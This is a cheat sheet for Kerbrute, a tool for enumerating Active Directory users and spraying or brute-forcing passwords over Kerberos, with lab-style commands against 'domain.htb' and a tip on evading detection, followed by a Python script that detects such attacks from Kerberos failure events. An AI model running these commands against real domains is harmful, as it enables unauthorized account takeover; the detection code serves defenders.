🦁Kerbrute
Introduction
A tool to perform fast brute force attacks and enumerate valid Active Directory accounts through Kerberos pre-authentication.
Installation and Usage Guide
Clone the GitHub repository:
Detailed guide available through the following blog:
VERY IMPORTANT: Synchronize your system time with the Domain Controller
sudo ntpdate -s 10.10.10.10
User Enumeration
# Brute force to enumerate users
kerbrute userenum --dc 10.10.10.10 -d domain.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
Password Spraying and Brute Force
Password Spraying
# Password spraying - test one password against a list of users
kerbrute passwordspray -d domain.htb --dc dc.domain.htb users.txt 'password'
Brute Force Attacks
# Brute Force with a list of users and passwords
# Format: username:password
kerbrute bruteforce -d domain.htb --dc dc.domain.htb userspasswords.txt
# Brute Force against a single user with a password list
kerbrute bruteuser -d domain.htb --dc dc.domain.htb passwords.txt 'target_user'
Key Parameters
--dc: Specify the Domain Controller IP address
-d: Target domain name
userenum: Enumerate valid usernames
passwordspray: Test one password against multiple users
bruteforce: Test multiple username:password combinations
bruteuser: Test multiple passwords against one user
Tips and Best Practices
Always synchronize time with the Domain Controller before starting
Use comprehensive username lists for enumeration
Be mindful of account lockout policies when performing brute force attacks
Consider using delay options to avoid detection
Monitor for failed authentication logs on the target system
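The last tip, seen from the Domain Controller's side, as an added example that is not part of Kerbrute or the original page: it correlates Kerberos failure events 4768 (result code 0x6, unknown principal) and 4771 (failure code 0x18, pre-authentication failed) by source address. The CSV layout, the window and threshold values, and the sample rows are constructed assumptions.

```python
import csv
from collections import Counter, defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # assumed correlation window
THRESHOLD = 3                   # assumed; tune against normal logon noise
KINDS = {("4768", "0x6"): "unknown-user",   # KDC_ERR_C_PRINCIPAL_UNKNOWN
         ("4771", "0x18"): "bad-password"}  # KDC_ERR_PREAUTH_FAILED

# Constructed sample (hypothetical CSV export): time,event_id,source_ip,account,code
SAMPLE = """\
2024-05-01T10:00:01,4768,10.10.14.5,alice1,0x6
2024-05-01T10:00:01,4768,10.10.14.5,bob2,0x6
2024-05-01T10:00:02,4768,10.10.14.5,carol3,0x6
2024-05-01T10:05:10,4771,10.10.14.5,jsmith,0x18
2024-05-01T10:05:10,4771,10.10.14.5,mjones,0x18
2024-05-01T10:05:11,4771,10.10.14.5,akhan,0x18
2024-05-01T10:07:00,4771,10.10.20.30,jsmith,0x18
2024-05-01T11:00:00,4771,10.10.14.9,svc_backup,0x18
2024-05-01T11:00:01,4771,10.10.14.9,svc_backup,0x18
2024-05-01T11:00:02,4771,10.10.14.9,svc_backup,0x18
"""

def classify(kind, window):
    # Label one sliding window of (time, account) failures from a single source.
    per_account = Counter(acct for _, acct in window)
    if len(per_account) >= THRESHOLD:  # many different accounts in the window
        return "user-enumeration" if kind == "unknown-user" else "password-spray"
    if kind == "bad-password" and max(per_account.values()) >= THRESHOLD:
        return "single-account-bruteforce"
    return None

def detect(log_text):
    # Return sorted (source_ip, label) alerts for bursts of Kerberos failures.
    hits = defaultdict(list)  # (kind, source_ip) -> [(time, account)]
    for ts, event_id, src, acct, code in csv.reader(log_text.strip().splitlines()):
        kind = KINDS.get((event_id, code.lower()))
        if kind:
            hits[(kind, src)].append((datetime.fromisoformat(ts), acct.lower()))
    alerts = set()
    for (kind, src), events in hits.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > WINDOW:
                start += 1  # drop failures older than the window
            if label := classify(kind, events[start:end + 1]):
                alerts.add((src, label))
    return sorted(alerts)
```

These events are only recorded when failure auditing for the Kerberos Authentication Service is enabled on the Domain Controllers.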